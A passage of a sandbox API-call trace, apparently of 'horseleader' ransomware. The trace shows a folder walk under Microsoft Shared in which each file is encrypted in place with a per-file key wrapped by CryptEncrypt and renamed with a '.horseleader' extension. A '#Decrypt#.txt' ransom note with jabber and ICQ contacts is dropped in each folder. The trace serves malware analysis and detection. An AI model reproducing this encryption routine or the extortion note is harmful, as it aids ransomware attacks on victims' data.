lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37d2a200, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x37d2a200, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xbfc6, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WATERMAR.ELM", cAlternateFileName="")) returned 1 [0248.275] lstrcmpiW (lpString1="WATERMAR.ELM", lpString2="Windows") returned -1 [0248.276] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM") returned 81 [0248.276] StrStrIW (lpFirst="WATERMAR.ELM", lpSrch=".horseleader") returned 0x0 [0248.276] lstrcmpW (lpString1="WATERMAR.ELM", lpString2="#Decrypt#.txt") returned 1 [0248.276] lstrcmpW (lpString1="WATERMAR.ELM", lpString2="_uninstalling_.png") returned 1 [0248.276] lstrlenW (lpString=".testttjffg") returned 11 [0248.276] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM", lpSrch=".testttjffg") returned 0x0 [0248.276] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.276] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.276] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\watermar.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.277] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM") returned 81 [0248.277] StrStrW (lpFirst="WATERMAR.ELM", lpSrch=".txt") returned 0x0 [0248.277] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=49094) returned 1 [0248.277] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.279] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.280] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.280] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.281] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.281] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.281] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1fc6, lpOverlapped=0x0) returned 1 [0248.281] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe03a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.281] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, 
nNumberOfBytesToWrite=0x1fc6, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1fc6, lpOverlapped=0x0) returned 1 [0248.281] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.282] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.282] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.282] CloseHandle (hObject=0x1a4) returned 1 [0248.282] GetProcessHeap () returned 0x780000 [0248.282] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.282] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM.horseleader") returned 93 [0248.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\watermar.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\watermar.elm.horseleader")) returned 1 [0248.283] GetProcessHeap () returned 0x780000 [0248.283] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.283] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, 
ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x2ab, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WATERMAR.INF", cAlternateFileName="")) returned 1 [0248.283] lstrcmpiW (lpString1="WATERMAR.INF", lpString2="Windows") returned -1 [0248.284] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF") returned 81 [0248.284] StrStrIW (lpFirst="WATERMAR.INF", lpSrch=".horseleader") returned 0x0 [0248.284] lstrcmpW (lpString1="WATERMAR.INF", lpString2="#Decrypt#.txt") returned 1 [0248.284] lstrcmpW (lpString1="WATERMAR.INF", lpString2="_uninstalling_.png") returned 1 [0248.284] lstrlenW (lpString=".testttjffg") returned 11 [0248.284] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF", lpSrch=".testttjffg") returned 0x0 [0248.284] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.284] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\watermar.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.285] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF") returned 81 [0248.285] StrStrW (lpFirst="WATERMAR.INF", 
lpSrch=".txt") returned 0x0 [0248.285] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=683) returned 1 [0248.285] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2ab, lpOverlapped=0x0) returned 1 [0248.286] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffd55, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.287] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2ab, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2ab, lpOverlapped=0x0) returned 1 [0248.287] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.287] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.287] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.287] CloseHandle (hObject=0x1a4) returned 1 [0248.288] GetProcessHeap () returned 0x780000 [0248.288] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.288] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF.horseleader") returned 93 [0248.288] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF" (normalized: "c:\\program files\\common files\\microsoft 
shared\\themes14\\watermar\\watermar.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\watermar.inf.horseleader")) returned 1 [0248.289] GetProcessHeap () returned 0x780000 [0248.289] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.289] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x2ab, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WATERMAR.INF", cAlternateFileName="")) returned 0 [0248.289] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.289] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\#Decrypt#.txt") returned 82 [0248.289] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.290] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new 
account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0248.290] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.291] lstrlenA (lpString="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") returned 1368 [0248.291] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.292] CloseHandle (hObject=0x158) returned 1 [0248.292] GetProcessHeap () returned 0x780000 [0248.292] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.292] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WATERMAR", cAlternateFileName="")) returned 0 [0248.292] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0248.292] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\#Decrypt#.txt") returned 73 [0248.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0248.293] 
lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0248.293] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0248.294] lstrlenA (lpString="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") returned 1368 [0248.294] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0248.294] CloseHandle (hObject=0x21c) returned 1 [0248.294] GetProcessHeap () returned 0x780000 [0248.294] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0248.295] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="TRANSLAT", cAlternateFileName="")) returned 1 [0248.295] lstrcmpiW (lpString1="TRANSLAT", lpString2="Windows") returned -1 [0248.295] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT") returned 59 [0248.295] lstrcmpW (lpString1="TRANSLAT", lpString2=".") returned 1 [0248.295] lstrcmpW (lpString1="TRANSLAT", lpString2="..") returned 1 [0248.295] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.295] GetProcessHeap () returned 0x780000 [0248.295] RtlAllocateHeap (HeapHandle=0x780000, 
Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.295] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*") returned 61 [0248.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0248.297] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.297] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\.") returned 61 [0248.297] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.297] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0248.298] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.298] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\..") returned 62 [0248.298] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.298] lstrcmpW (lpString1="..", lpString2="..") 
returned 0 [0248.298] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ARFR", cAlternateFileName="")) returned 1 [0248.298] lstrcmpiW (lpString1="ARFR", lpString2="Windows") returned -1 [0248.298] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR") returned 64 [0248.298] lstrcmpW (lpString1="ARFR", lpString2=".") returned 1 [0248.298] lstrcmpW (lpString1="ARFR", lpString2="..") returned 1 [0248.298] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.298] GetProcessHeap () returned 0x780000 [0248.298] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.298] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*") returned 66 [0248.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 
[0248.299] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.299] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\.") returned 66 [0248.299] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.299] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.300] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.300] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\..") returned 67 [0248.300] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.300] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.300] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b324b00, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b324b00, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0x195018, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ARFR.ITS", cAlternateFileName="")) returned 1 [0248.300] lstrcmpiW (lpString1="MSB1ARFR.ITS", lpString2="Windows") returned -1 [0248.300] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS") returned 77 [0248.300] StrStrIW (lpFirst="MSB1ARFR.ITS", lpSrch=".horseleader") returned 0x0 [0248.300] lstrcmpW (lpString1="MSB1ARFR.ITS", lpString2="#Decrypt#.txt") returned 1 [0248.300] lstrcmpW (lpString1="MSB1ARFR.ITS", lpString2="_uninstalling_.png") returned 1 [0248.300] lstrlenW (lpString=".testttjffg") returned 11 [0248.300] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS", lpSrch=".testttjffg") returned 0x0 [0248.301] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.301] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.301] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.301] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS") returned 77 [0248.302] StrStrW 